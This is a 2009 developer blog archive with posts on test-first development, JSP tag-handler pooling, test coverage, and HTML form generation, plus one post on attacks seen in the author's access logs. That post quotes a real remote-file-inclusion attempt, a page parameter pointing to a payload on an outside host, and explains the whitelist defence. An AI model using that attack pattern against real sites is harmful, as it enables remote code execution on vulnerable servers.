Friday, October 30, 2009

Tests are the Story

I have a recurring discussion with my friend James regarding test-first development. He believes that writing tests first is like writing an outline for an academic paper or novel. And sometimes you don't know where the story is going to end up when you start writing. In the past, I've always countered that with the liberal-arts-major argument that you should know what you're going to say before you say it.

However, he makes a good point. Even when you have a goal in mind, sometimes the path to that goal takes unexpected twists and turns. If you write your tests presuming a specific order of steps, they'll become obsolete when the real story doesn't follow the outline.

So here's a different response: the tests are the story. The production code is merely a footnote.

The ultimate goal is satisfied users, and the tests are development stand-ins for those users (even if the "user" is another piece of code). As you write your tests, you should be thinking not of the needs of your mainline code, but of the needs of those users. As your understanding of those users changes, your tests will change. Some will be deleted.

You could call this wasted effort, but that's misleading. It was necessary effort, because you didn't have a perfect understanding of the users' needs. The real question is: was it better to explore the plot using tests, or to simply write some mainline code and hope that it did what it should?

Tuesday, October 27, 2009

Tag Reuse in JSPs

One thing that's always puzzled me about JSP taglibs is the mechanics of tag reuse — what happens when you invoke the same tag twice on a page. The Tag JavaDoc says the following:

After the doEndTag invocation, the tag handler is available for further invocations (and it is expected to have retained its properties).

This statement sent up a bunch of red flags when I first read it. And it's done the same for others: I've seen tag implementations that explicitly reset all attributes in doEndTag(). But if this was the required implementation, I'd expect to see it mentioned in the J2EE tutorial or sample code, and it isn't.
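That defensive pattern looks something like this (a minimal sketch; the tag and its attribute are hypothetical, not from any real taglib):

import javax.servlet.jsp.JspException;
import javax.servlet.jsp.tagext.TagSupport;

public class GreetingTag extends TagSupport {
    private String name;   // optional attribute

    public void setName(String name) { this.name = name; }

    @Override
    public int doStartTag() throws JspException {
        try {
            pageContext.getOut().print("Hello, " + (name != null ? name : "world"));
        } catch (java.io.IOException e) {
            throw new JspException(e);
        }
        return SKIP_BODY;
    }

    @Override
    public int doEndTag() throws JspException {
        name = null;   // defensive reset, so a reused instance starts fresh
        return EVAL_PAGE;
    }
}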

Moreover, the description makes no sense: you can't build a software system on components that will render arbitrary values depending on where they're invoked. My first hint came from examining the Java code generated by Tomcat:

private org.apache.jasper.runtime.TagHandlerPool _jspx_tagPool_prodList_form_visible_userId_operation_name_listName_htmlId_format;
private org.apache.jasper.runtime.TagHandlerPool _jspx_tagPool_prodList_form_visible_userId_timeout_operation_name_listName_htmlId_format;

Those are pretty long names. And interestingly, they include the parameters used in the tags. And they're different. That led me back to the JSP specifications, with a more focused search. And on page 2-51, we see the rules:

The JSP container may reuse classic tag handler instances for multiple occurrences of the corresponding custom action, in the same page or in different pages, but only if the same set of attributes are used for all occurrences.

I'd love to know the rationale behind this — and whether it was intentional or a “retro-specification” to cover decisions made in the reference implementation (Tomcat). To me, it seems like premature optimization: assume that it's expensive to instantiate a tag handler or set its attributes, so go to extra effort to pool those instances. If, instead, the specification required handlers to be explicitly instantiated per use, it would drive developers toward lightweight handlers that collaborate with external services, which in my opinion is a far better way to write them.
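To sketch what I mean (the names and the service lookup here are hypothetical), a lightweight handler holds nothing but its attributes and delegates the real work to a shared, thread-safe service; there's nothing left worth pooling:

import java.io.IOException;
import javax.servlet.jsp.JspException;
import javax.servlet.jsp.tagext.TagSupport;

// A stateless collaborator; one shared, thread-safe instance per webapp.
interface ProductListService {
    String render(String listName);
}

public class ProductListTag extends TagSupport {
    private String listName;

    public void setListName(String listName) { this.listName = listName; }

    @Override
    public int doStartTag() throws JspException {
        ProductListService service = (ProductListService)
            pageContext.getServletContext().getAttribute("productListService");
        try {
            pageContext.getOut().print(service.render(listName));
        } catch (IOException e) {
            throw new JspException(e);
        }
        return SKIP_BODY;
    }
}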

Monday, October 26, 2009

Unease

If you really don't care you aren't going to know it's wrong. The thought'll never occur to you. The act of pronouncing it wrong's a form of caring.

Zen and the Art of Motorcycle Maintenance is a book that you'll either love or hate. To some, it is a bombastic restatement of ideas that everyone already knows. To others, a lightweight gateway to heavyweight philosophy. And then there are people who believe it changed their life. I can't say that I'm one of the latter, but the book resonates with me on many levels, and I've reread it every few years since I was 15.

I recently paraphrased the above quote in a presentation on testing and coverage. The main point of my presentation was that 100% coverage does not guarantee sufficient testing; an audience member asked the obvious question “then how do you know that you've written enough tests?” My answer can be paraphrased as “you've written enough tests when you feel comfortable that you've written enough.”
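To see why coverage alone proves so little, consider a contrived illustration (the code is entirely hypothetical): the test below executes every line and both branches of apply(), yet the boundary bug survives untouched.

import org.junit.Assert;
import org.junit.Test;

// Intended: 10% off orders of $100 or more. The bug: > should be >=.
class Discount {
    static double apply(double total) {
        if (total > 100.0) {
            return total * 0.9;
        }
        return total;
    }
}

public class DiscountTest {
    @Test
    public void coversEveryLine() {
        Assert.assertEquals(90.01, Discount.apply(100.01), 0.01);  // true branch
        Assert.assertEquals(50.0, Discount.apply(50.0), 0.0);      // false branch
        // 100% line and branch coverage, yet apply(100.0) returns 100.0
        // rather than the intended 90.0, because nobody probed the boundary.
    }
}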

My answer wasn't a terribly good one, to be honest. It did, however, set up my closing slide, which pointed out that you need committed, test-infected developers to get good tests. If you don't have that, you might as well buy a tool that throws random data at your code. But how does one arrive at the level of caring needed to write good tests? And is it inborn, or something that comes from experience?

I've been thinking about these questions this morning, because I'm refactoring some code and am left with what I consider an ugly method call: if called in one situation, I want it to throw an exception; if called in another, I want it to fail silently and return null. I've been puzzling over whether I really need to break the method into two parts (there's a sketch at the end of this post), and also whether I should think more about another quote from Pirsig:

What's more common is that you feel unpeaceful even if it's right

Sometimes, perhaps, good enough is good enough.
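For what it's worth, the split I'm contemplating would look something like this. It's a hypothetical sketch, not my actual code: one method insists, the other shrugs.

import java.util.HashMap;
import java.util.Map;

// Hypothetical illustration of splitting the dual-personality method.
public class Registry {
    private final Map<String, Object> entries = new HashMap<String, Object>();

    // Caller expects the entry to exist; absence is a programming error.
    public Object getRequired(String key) {
        Object value = entries.get(key);
        if (value == null) {
            throw new IllegalStateException("no such entry: " + key);
        }
        return value;
    }

    // Caller is merely probing; absence is an expected answer.
    public Object getOptional(String key) {
        return entries.get(key);
    }
}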

Monday, October 12, 2009

Building a Wishlist Service: HTML Forms

Back to the wishlist service, and it's time to look at the client side. In particular, the mechanism that the client uses to submit requests. XML on the browser is, quite simply, a pain in the neck. While E4X is supposed to be a standard, support for it is limited. Microsoft, as usual, provides its own alternative. Since XML is a text format, you could always construct strings yourself, but there are enough quirks that this often results in unparseable XML.

Against the pain of XML, we have HTML forms. They've been around forever, work the same way in all browsers, and don't require JavaScript. They're not, however, very “Web 2.0 friendly”: when you submit a form, it reloads the entire page. Filling this gap, the popular JavaScript libraries provide methods to serialize form contents and turn them into an AJAX request. As long as you're sending simple data (i.e., no file uploads), these libraries get the job done.

To simplify form creation, I created some JSP tags. This provides several benefits, not least of which is that I can specify required parameters such as the user ID and wishlist name. I also get to use introspection and intelligent enums to build the form: you specify an “Operation” value in the JSP, and the tag implementation can figure out whether it needs a GET or a POST, what parameters need to go on the URL, and what fields need to go in the body.
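As a sketch of the idea (the enum and its values are hypothetical, not my actual code), each operation carries enough metadata for the tag to do that figuring:

// Each operation knows its HTTP method, so the tag can decide how to
// emit the form and where its parameters belong.
public enum Operation {
    RETRIEVE_LIST("GET"),
    ADD_ITEM("POST"),
    DELETE_ITEM("POST");

    private final String httpMethod;

    Operation(String httpMethod) {
        this.httpMethod = httpMethod;
    }

    public String getHttpMethod() {
        return httpMethod;
    }

    // Only a POST form can carry parameters on its action URL; a GET
    // form's query string is rebuilt by the browser from its fields.
    public boolean allowsUrlParameters() {
        return "POST".equals(httpMethod);
    }
}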

One of the more interesting “learning experiences” was the difference between GET and POST forms. With the former, the browser will throw away any query string provided in the form's action attribute, and build a new string from the form's fields. With the latter, the query string is passed untouched. In my initial implementation I punted, and simply emitted everything as input fields: the server didn't care, because getParameter() doesn't differentiate between URL and body. This offended my sense of aesthetics, however, so I refactored the code into a class that would manage both the action URL and a set of body fields. Doing so had the side benefit that I could write out-of-container unit tests for all of the form generation code.
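That class looks roughly like this (a hypothetical sketch; real code would also URL-encode names and values):

import java.util.LinkedHashMap;
import java.util.Map;

public class FormSpec {
    private final String baseUrl;
    private final String method;   // "GET" or "POST"
    private final Map<String, String> urlParams = new LinkedHashMap<String, String>();
    private final Map<String, String> bodyFields = new LinkedHashMap<String, String>();

    public FormSpec(String baseUrl, String method) {
        this.baseUrl = baseUrl;
        this.method = method;
    }

    public void addUrlParam(String name, String value)  { urlParams.put(name, value); }
    public void addBodyField(String name, String value) { bodyFields.put(name, value); }

    // POST forms keep their parameters on the action URL; GET forms can't,
    // because the browser discards the query string and rebuilds it.
    public String getActionUrl() {
        if ("GET".equals(method) || urlParams.isEmpty()) {
            return baseUrl;
        }
        StringBuilder sb = new StringBuilder(baseUrl);
        char separator = '?';
        for (Map.Entry<String, String> param : urlParams.entrySet()) {
            sb.append(separator).append(param.getKey()).append('=').append(param.getValue());
            separator = '&';
        }
        return sb.toString();
    }

    // For a GET form, URL parameters are demoted to hidden input fields.
    public Map<String, String> getFields() {
        Map<String, String> fields = new LinkedHashMap<String, String>(bodyFields);
        if ("GET".equals(method)) {
            fields.putAll(urlParams);
        }
        return fields;
    }
}

A class like this needs nothing from the servlet container, which is exactly what made the out-of-container tests possible.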

The other problem came from separating the form's markup from the JavaScript that makes it work. This is current “best practice,” and I understand the rationale behind it, but it makes me uncomfortable. In fact, it makes me think that we're throwing away lessons learned about packaging over the last 30 years. But that's another post.

Saturday, October 3, 2009

Script Kiddies

As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.

What's really interesting about my access logs, however — and why I look at them rather than using a web beacon — are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a typical log entry, which appears to come from a home computer:

68.217.2.156 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://64.15.67.17/~calebsbi/logo.jpg? HTTP/1.1"

If my pages blindly took the page parameter value and passed it to include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).
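The defense is simple: treat the parameter as a key into a whitelist, never as a path. Here's the idea sketched as a hypothetical Java servlet (my site is PHP, but the principle is identical):

import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class PageServlet extends HttpServlet {
    private static final Set<String> PAGES =
        new HashSet<String>(Arrays.asList("home", "articles", "contact"));

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String page = req.getParameter("page");
        if (page == null || !PAGES.contains(page)) {
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }
        // Safe: the include target is chosen from the whitelist, never
        // taken verbatim from the request.
        req.getRequestDispatcher("/WEB-INF/pages/" + page + ".jsp")
           .forward(req, resp);
    }
}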

What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the page parameter: I don't get hits with include= or sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.

So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.